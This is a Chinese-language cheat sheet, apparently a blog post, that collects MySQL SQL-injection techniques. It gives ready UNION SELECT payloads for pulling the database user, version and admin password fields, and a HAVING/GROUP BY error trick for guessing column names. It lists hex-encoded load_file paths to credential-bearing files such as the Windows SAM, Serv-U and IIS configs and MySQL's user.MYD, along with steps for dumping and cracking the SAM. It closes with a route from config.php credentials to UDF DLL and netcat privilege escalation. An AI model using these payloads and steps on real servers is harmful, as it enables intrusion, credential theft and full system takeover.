MYSQL 注入资料总结

and 1 = 2 union all select 1,2,3,user()
and 1 = 2 union all select 1,2,3,version()
and 1 = 2 union all select 1,2,3,database()
and 1 = 2 union all select 1,2,3,load_file(0x文件路径)
and 1 = 2 union all select 1,2,3,password from admin
and 1 = 2 union all select 1,2,3,user from mysql.user


以上的password是字段名  admin是表名,但是在进行union的时候 我们并不知道数据表的名字和字段名称,所以我们就来看看如果暴字段名称。

暴字段名称在5.0以上版本都是依靠infomation库来读取的,但是5.0以下版本没有information库,所以一般都是用having,having与group by的关系类似于where与select的关系,where是针对select的条件,having是group by的筛选条件。

select * from tb_test having 1=1   会返回一个错误,错误里包含第一个字段的名称,得到第一个字段的名称比如是id之后
select * from tb_test group by id having 1=1  会返回错误  错误中包含第二个字段的名称,然后依次试出所有字段名称。



mysql有一个load_file函数很好用,不过需要当前连接为root权限
使用方法:load_file(0x路径字符串的16进制),下面是常用的一些敏感文件
load_file(0x633A2F77696E646F77732F6D792E696E69)   c:/windows/my.ini   WinMyAdmin1.1版本使用了明文在这里保存了用户名和密码
load_file(0x633A2F77696E646F77732F7068702E696E69)   c:/windows/php.ini   查看php版本信息
load_file(0x633A2F626F6F742E696E69)   c:/boot.ini   查看操作系统信息


还有如下一些敏感信息:
c:/winnt/php.ini     
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
c:\Program Files\Serv-U\ServUDaemon.ini
c:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
c:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
c:\Program Files\RhinoSoft.com\ServUDaemon.exe
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
d:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
c:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
C:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码

注意读取SAM等二进制文件的时候使用hex函数进行转换,如:
select 1,2,3,hex(load_file(0x633A5C77696E646F77735C7265706169725C73616D))
然后将hex后的内容copy下来,打开hex_workshop,使用特殊粘贴的方式,然后另存为hex文件,就得到了服务器的SAM文件,然后打开LC5(推荐容笑汉化版)跑密码。

另外还可以爆出web路径后  读index.php内容,然后找到config.php,通过config.php读出mysql数据库的账号密码,然后就可以上传:Mix.dll My_udf.dll两个dll配合NC进行提权了。


你可能感兴趣的:(mysql)